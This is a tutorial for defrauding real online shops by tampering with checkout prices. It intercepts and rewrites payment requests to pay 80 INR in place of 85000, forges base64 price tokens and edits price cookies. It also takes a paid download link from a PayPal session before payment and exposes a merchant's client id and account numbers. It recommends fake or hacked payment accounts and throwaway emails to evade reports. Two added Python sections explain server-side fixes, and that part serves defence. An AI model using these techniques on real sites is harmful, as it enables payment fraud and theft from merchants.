If you decide to learn price changing and apply it, then you must be fully ready for insults, refunds and fast leaking. Hahaha
Prepare Chrome or Firefox plus Tamper Dev, pick some targets, and let's start inspecting the web.... ;)
HTML is the web markup language that lays out the elements and forms of a web page...
1- "price":"2.79","priceValidUntil":"2023-06-19","priceSpecification":{"price":"2.79", (schema.org Offer metadata in the page source)
2-
<script type="text/javascript">
$('#button-cart').on('click', function () {
    var product_id = "amNraG6ZcGlhbmhj";
    var quantity = $("input[name='quantity']").val();
    var name = "1 Billion Worldwide Email Lists database active VIP High quality package B2B,B2C";
    var image = "/static/7935/60ee87fb6854b6d1fc97431f.png";
    var price = "$2.79";
    price = price.replace('$', '');
    // the rest of the click handler is not shown
});
</script>
3-
<p class="price">$2.79</p>
var price = "$2.79"; price = price.replace('$', '');
https://www.99datacd.com/pay.php#pay
This is our second price changing example.
We will target this package:
https://www.99datacd.com/product/indian-business-directory.html#Top-100-Business-Data
which is very expensive.
As ethical leakers + tamper boys we don't care about the price... all we care about is the instant delivery of the digital stuff... ;)
And the site's logo clearly says (INSTANT DOWNLOAD) LOL XD
It's your choice, but for better results: try changing the price at the start of the flow every time, and if that fails go for the middle or the end....
Changing the price early is useful because of the price and amount checkers + verifiers that sit later in the flow...
But keep trying + learning.
Let's continue.
Now input any random data for phone + name.
Afterwards you will be redirected to a form asking for more information (address, name, country, email, phone).
Warning: the delivery email must always be valid, or you can use temporary mails like tempail.com:
https://temp-mail.org/en/
https://tempail.com/en/ (personally used by me a lot!!)
https://tempmailo.com/
When ready, fire up Tamper Dev or Burp Suite. In my case I'm using Tamper Dev.
Turn intercept ON, then click the PROCEED button!!
This is the output (you amazing price changers), one form field per line:
courier=downloadonly
&account_id=11028
&return_url=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2F99datacd.com%2Fresponse.php%3FDR%3D%7BDR%7D
&mode=LIVE
&reference_no=4757
&amount=85000
&currency=INR
&description=%23cd_307%23
&prd_list=Super+Discounted+Top+100+Trades+Data+Combo
&name=je+leak+you
&address=hahahah
&city=hahahah
&state=hahahah
&postal_code=395983
&country=ATA
&email=hirtegepse%40vusra.com
&phone=0676490924
&submitted=Proceed
All we care about is the amount parameter (amount=85000, highlighted in red in the screenshot)...
1 United States Dollar equals 77.94 Indian Rupee
So 1 dollar is about 77 or 78 INR, and we will change 85000 to 80.
Bonus trick: you can use Copy as cURL plus a curl-to-Python converter to change the price.
Let's do it! 3 things we need:
1- F12 (DevTools) in Firefox or Chrome.
2- The Copy as cURL function, with the request stopped before the response appears...
3- Paste the curl output here, picking Python as the conversion target:
https://curlconverter.com/
Afterwards press CTRL+F and search for amount= or for the exact purchase price. If found: congrats, you can change the price from Python. If not, you will have to find another bug for the process..
url = response.url        # the redirected URL after payment started..
txtrsp = response.text    # the response page after payment started..
print(url)
print(txtrsp)
Tips + bonus: requests.post() already follows redirects (allow_redirects defaults to True for every method except HEAD), so the two lines above rely on that default and adding allow_redirects=True changes nothing. What is actually useful on the final line is allow_redirects=False: it keeps the 302 so you can read response.headers['Location'] (the gateway handoff URL) before the redirect is followed.
response = requests.post('https://www.99datacd.com/secure.php', cookies=cookies, headers=headers, data=data)
response = requests.post('https://www.99datacd.com/secure.php', cookies=cookies, headers=headers, data=data, allow_redirects=False)
Bonus tips: while sending requests or responses edited in Tamper Dev, MAKE SURE THE REQUEST IS FULLY FORWARDED (after that you can click the blue CANCEL button on top or disable the interception radio button)... EASY PEASY
And boom, as you see the Razorpay payment amount is 100 INR, SAME AS CHOSEN...
Can we go further ?? yes just use fake payment accounts ( no real owner account of ur own ) then
steal the digital download ( instant downloads option only... )
That's enough for our first part of price changing through HTML-JS manipulation...
So as you know, some shops or websites use JS, PHP and CSS files (on the same site or outside the same origin).
We don't care whether they are outside or inside. All we care about is the vulnerability, or whether they contain price amounts..
Afterwards we will test this website for this purpose:
https://bulkdata.io/fr/product/fr-charity-companies
This is the exact process:
1- Navigate to the page.
2- Open the Network tab of the inspector with F12.
3- Refresh the page until all requests have loaded and the page is fully loaded..
4- Press CTRL+F, then search for the exact amount, with or without dots..
Let's inspect further.
Just double click on the prices highlighted in yellow!
You will be forwarded to the exact request containing the price... (easy enough, right? LOL XD)
If the price only appears inside plain HTML tags (<td>, <tr>, <a>, <div> ... etc.), it 10000% cannot be tampered with: those values are only displayed, the server never reads them back. The price must be inside a JS function or a POST/GET parameter that the browser actually sends..!
"priceCurrency": "EUR", "price": 29, "availability": "https://schema.org/OnlineOnly", "priceValidUntil": "2022-05-24"
This part exists in the HTML source and is useless: it is schema.org metadata for search engines. If the price amount you discover sits next to "priceValidUntil", it means just move on, man, ahahhaa
Or you can use Tamper Dev instead, like this:
The page uses a new tab for proceeding to payment, so the solution is simple: remove it with inspect element.
target="_blank" is the attribute that opens the payment in a new tab:
Remove it from the HTML, then press the payment button NOW!
Easy enough, lol, payment intercepted successfully!! NO NEED TO FOLLOW THE NEW TABS EVERY TIME!
We can celebrate now woooohoooo
Oh wait! We can't celebrate until the price is changed haha
Let's move to the final targets...
Let's try other targets:
Preserve log must already be activated.
Then scroll the page and add to cart until the payment page starts, so you can search all the requests passed until the payment page...
So first of all you must find the base64 "encrypted" price amount, for example 500.00 USD, then go to a base64 encode website, encode the new price in the same format, and replace it at the tamper point ;) easy peasy
https://www.base64encode.net/
Base64 is not encryption. It's basically a way of encoding arbitrary binary data in ASCII text. It takes 4 characters per 3 bytes of data, plus potentially a bit of padding at the end. Essentially each 6 bits of the input is encoded in a 64-character alphabet. The "standard" alphabet uses A-Z, a-z, 0-9 and + and /, with = as a padding character. There are URL-safe variants (- and _ in place of + and /).
If the return URL does not exist, it means it's not instant delivery, or the delivery is by email on the server side...
One test:
https://www.nonprofitlists.com/buy-database.html
Go to the Buy with PayPal button, click it, then use the API URL token...
Output (the return_url inside the checkout session, i.e. the download link, visible before any payment is made):
https://www.mediafire.com/download/yhq8fk4tz3p3vk9
unt_from_api":299}}],
"postBackData":{},
"shipping_address_list":[null],
"shipping_phone_number_list":[null],
"phone_fields":{}},
"state":"created",
"supplementary":{"buyer_set_in_session":false},
"payer":{},
"partnerIntegration":false,
"cartHasInventory":false,
"instantUpdateIntegration":false,
"grossTotalAmount":{"value":"299.00","currency":"USD"},
"paypalForPartner":false,
"partnerDetail":{"businessName":"STSAdmin","clientId":"Ac-33pHd-kCzSZnWI-2j--FZXoTkB5pce3oke0yiwUOIpdaiasVzyiKS3ZfBla9efL3oetCALipmEsOY","accountNumber":"1822067133961137468"},
"redirectUrls":{"return_url":"https://www.mediafire.com/download/yhq8fk4tz3p3vk9","cancel_url":"https://www.nonprofitlists.com/buy-database.html"},
"purchaseUnits":[{"amount":{"total":"299.00","currency":"USD","details":{"subtotal":"299.00"}},
"payee":{"merchant_id":"PREQ8VTXZEYTY","encrypted_email":"ecMGppqlEGhReFpx1rR71BXafVRx7VPpHSRPlwwlN-ZAtwa3pzSaprJXxeNP_MHRzlDoMgGTTcpgvK8y"},
"item_list":{"items":[{"name":"NONPROFIT
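Added Python example (mine; not code from this page, from PayPal, or from the site above). The checkout session shown carries a return_url that points straight at the file host, so the deliverable is readable in the browser before any payment is captured. The first function flags that pattern in a constructed checkout fragment (placeholder key and hosts, modelled on the JSON above); the rest sketches the hypothetical hardened flow: orders live server side, only the gateway's server-to-server webhook can mark one paid (and only when the captured amount equals what the order is worth), and return_url points at a merchant page that hands out a random single-use download token after that.

```python
import json
import secrets
from urllib.parse import urlparse

# Constructed checkout fragment modelled on the JSON above (placeholder key and hosts).
CHECKOUT_JSON = json.dumps({
    "grossTotalAmount": {"value": "299.00", "currency": "USD"},
    "redirectUrls": {
        "return_url": "https://www.mediafire.com/download/EXAMPLEKEY",
        "cancel_url": "https://shop.example/buy-database.html",
    },
})


def return_url_leaks_deliverable(checkout_json, merchant_host):
    """The smell in the capture: return_url points off-site, at the file itself, instead of at
    a merchant page that checks payment first."""
    data = json.loads(checkout_json)
    host = urlparse(data["redirectUrls"]["return_url"]).hostname
    return host != merchant_host


# Hypothetical hardened flow. In-memory dicts stand in for the merchant's database.
ORDERS = {}
DOWNLOAD_TOKENS = {}


def create_order(order_id, amount, currency, file_path):
    ORDERS[order_id] = {"amount": amount, "currency": currency, "file": file_path, "paid": False}
    return order_id


def gateway_webhook(order_id, captured_amount, captured_currency):
    """Server-to-server notification from the gateway: the only code path that sets paid=True,
    and only when what was captured equals what the order is worth."""
    order = ORDERS[order_id]
    if (captured_amount, captured_currency) == (order["amount"], order["currency"]):
        order["paid"] = True
    return order["paid"]


def fulfilment_allowed(order_id):
    return ORDERS[order_id]["paid"]


def return_page(order_id):
    """What return_url should point at. Issues nothing unless the webhook already confirmed
    payment; the link it builds carries a random single-use token, not the file's location."""
    order = ORDERS[order_id]
    if not order["paid"]:
        raise PermissionError("payment not confirmed for order %s" % order_id)
    token = secrets.token_urlsafe(32)
    DOWNLOAD_TOKENS[token] = order_id
    return "https://shop.example/download?t=" + token


def serve_download(token):
    """Consumes the token on first use, so a copied link cannot be replayed."""
    order_id = DOWNLOAD_TOKENS.pop(token, None)
    if order_id is None:
        raise PermissionError("invalid or already used download token")
    return ORDERS[order_id]["file"]


if __name__ == "__main__":
    print("return_url leaks the file:", return_url_leaks_deliverable(CHECKOUT_JSON, "shop.example"))
    create_order("4757", "299.00", "USD", "/srv/files/nonprofit.zip")
    print("paid after tampered capture:", gateway_webhook("4757", "1.00", "USD"))
    print("paid after correct capture:", gateway_webhook("4757", "299.00", "USD"))
    link = return_page("4757")
    print("download link:", link)
    print("served:", serve_download(link.split("t=", 1)[1]))
```

The point of the webhook comparison is that a tampered checkout amount, even if the gateway accepts it, never unlocks the order, and the point of the token is that nothing in the client-visible session names the file.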
Playground for you:
https://www.nonprofitlists.com/buy-database.html
https://www.emailingleads.com/buy-indian-email-lists/
https://jwt.io/ (small tool to decode JWT tokens for inspection + modify values) very useful if you like decoding things... (a JWT is signed: the decoded claims are readable by anyone, but an edited token only passes if the server fails to verify the signature)
So afterwards:
The best application of this concept is to check the local storage values of a given website while doing all the actions.
My own technique for routing Firefox through Burp Suite is:
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
Then point it at 127.0.0.1 and the port shown under Burp Suite >> Proxy >> Options, then navigate to http://burp to install Burp's CA certificate.
The only encodings you will usually meet for price digits are: BASE64 - MD5 - TOKENS .....
For MD5 "decode" (really a lookup of known hashes, since MD5 is one-way): https://hashes.com/en/decrypt/hash
For base64 decode: https://www.base64decode.org/
Tokens? Depends on the encoding mechanism used... (impossible to know without testing..)
Let's start with base64:
Let's pretend this is my add-to-cart PHP code (deliberately vulnerable: the price travels through the client):
Addcart.php >>
<?php
$price = '100';
$token = base64_encode($price);   // this function encodes a string to base64
header('Location: https://mywebsite.com/payment.php?id=1&prod=' . $token);
?>
Payment.php >>
<?php
$id_product = $_GET['id'];
$base64 = $_GET['prod'];
$real_price = base64_decode($base64);   // whatever the client sent back, decoded and trusted as the price
echo 'real price is : ' . $real_price . ' dollarz';
?>
The reason for these two scripts:
One takes the job of encoding the price and the other takes the opposite job (decoding the amount and using it for the payment).
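Added Python example (mine; not the page's PHP and not any site's code) covering the base64 price tokens described earlier, the MD5 variant from the encodings list, and the two PHP scripts above: the same encode/decode pair in Python, the attacker step the text describes (decode the token to learn the format, re-encode a new amount in the same format), the reason an MD5 of a price is no better (the value space is tiny, so it falls to a lookup, which is what hashes.com does), and the minimal server-side fix when a price really must round-trip through the client: an HMAC-signed token that the server verifies before use. The secret, product id and price values are constructed for the example; the real fix is still to look the price up server side by product id, as the earlier example does.

```python
import base64
import binascii
import hashlib
import hmac

# Constructed secret for the example; on a real server it lives in config, never in page source.
SECRET = b"server-only-secret-for-this-example"


# --- what Addcart.php / Payment.php do: plain base64, no integrity ---------------------------
def encode_price_token(price_text):
    return base64.b64encode(price_text.encode()).decode()


def decode_price_token(token):
    """Payment.php's side: whatever decodes is trusted."""
    return base64.b64decode(token).decode()


def forge_price_token(token, new_amount_text):
    """Attacker step: decode to learn the format (e.g. '500.00 USD'), keep everything after
    the amount, re-encode with the new amount."""
    original = decode_price_token(token)
    amount, _, rest = original.partition(" ")
    replaced = new_amount_text + ((" " + rest) if rest else "")
    return encode_price_token(replaced)


# --- why an MD5 of the price is not protection ----------------------------------------------
def price_hash(price_text):
    return hashlib.md5(price_text.encode()).hexdigest()


def crack_price_hash(digest, max_units=20000):
    """Try every plausible price string ('100' and '100.00' for 1..max_units); MD5 is fast and
    the space is tiny, which is exactly what the hash lookup sites exploit."""
    for n in range(1, max_units + 1):
        for candidate in (str(n), "%d.00" % n):
            if price_hash(candidate) == digest:
                return candidate
    return None


# --- minimal fix when the price must round-trip: sign it, verify before use ------------------
def sign_price_token(product_id, price_text, secret=SECRET):
    payload = ("%s|%s" % (product_id, price_text)).encode()
    mac = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + mac


def verify_price_token(token, secret=SECRET):
    """Returns (product_id, price_text) or raises ValueError; the MAC is compared in constant time."""
    try:
        payload_b64, mac = token.split(".", 1)
        payload = base64.urlsafe_b64decode(payload_b64)
    except (ValueError, binascii.Error):
        raise ValueError("malformed token")
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        raise ValueError("token altered: MAC does not match")
    product_id, _, price_text = payload.decode().partition("|")
    return product_id, price_text


def token_is_valid(token, secret=SECRET):
    try:
        verify_price_token(token, secret)
        return True
    except ValueError:
        return False


def forge_signed_token(token, new_price_text):
    """The same attacker step against the signed token: payload re-encoded, MAC left as is,
    because the secret needed to recompute it is not available to the client."""
    payload_b64, _, mac = token.partition(".")
    product_id, _, _ = base64.urlsafe_b64decode(payload_b64).decode().partition("|")
    new_payload = base64.urlsafe_b64encode(("%s|%s" % (product_id, new_price_text)).encode()).decode()
    return new_payload + "." + mac
```

forge_price_token() against the plain token succeeds every time; forge_signed_token() produces something that decodes fine but fails verify_price_token(), which is the whole difference between encoding and integrity.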
2- Cookies
I can honestly say it's the best extension creation from the best: C GARNIER!!
How to exploit this bug: simply find the encoded or decoded price value in the cookie, then replace it with a value in the same format (click save), then REFRESH and play with the payment actions on the target website...
Fair enough, right?
The developer used setcookie with the price of the product and read it back during payment as the amount of the purchase!
For instance:
<?php
$name = 'price_cookie';
$value = '1000';   // which means 10 $ or 1 $, depending on how the site stores its prices
$expires = time() + 3600;   // example values for the remaining setcookie arguments
$path = '/';
$domain = '';
$secure = false;
$httponly = true;
setcookie($name, $value, $expires, $path, $domain, $secure, $httponly);
?>
<?php
// here comes the exploit (you can use a cookie editor extension to change the amount and
// proceed with the new price, which can be 1 cent or 1 $)
$amount = $_COOKIE['price_cookie'];
$use_price = $amount;   // client-controlled value used directly as the charge
?>
Product listing seen on the target (screenshot text):
Germany email marketing database 1 Million / Germany 1 Million Emails List
MS Excel files in a .zip folder
Fields: company name, email address, city, zip and phone number; consumers: email only
Instant download
Stripe API error occurred (screenshot text): As per Indian regulations, only registered Indian businesses (i.e. sole proprietorships, limited liability partnerships and companies, but not individuals) can accept international payments. More info here: https://stripe.com/docs/india-exports
The idea of python price changing is taking the vulnerable request via right click > Copy > Copy as cURL (bash).
Afterwards paste the copied curl command here:
https://curlconverter.com/
Make sure Python is selected as the target (curl to Python)..
Finally paste the code into a new Python IDLE window or notepad.
Pretty easy, and can be used for many purposes other than price tampering...
Now time for:
2- Clear all sent requests: useful only when you deal with a large number of requests or big company websites... (they load many resources...)
4- Intercept ON or OFF:
Some intercepting price techniques or scenarios will require you to switch between ON and OFF!
GET READY FOR THAT!!
Final part of the book:
1- Don't always use a 1 $ price for leaking something you can't guarantee leaking.. it's a waste of time + money... (1 cent - 0.01 $ is enough sometimes.. you will lose more than you earn LOL)
2-Remember to pay for fake mails or
temporary mails ( they are better than use
real emails under your ip address... just to
prevent the risks of reports! )
3-Changing mac address + ip address is useful
but only if faker or hacked payment accounts
is used , there is no risk or damage at using
virtual machine or real ip....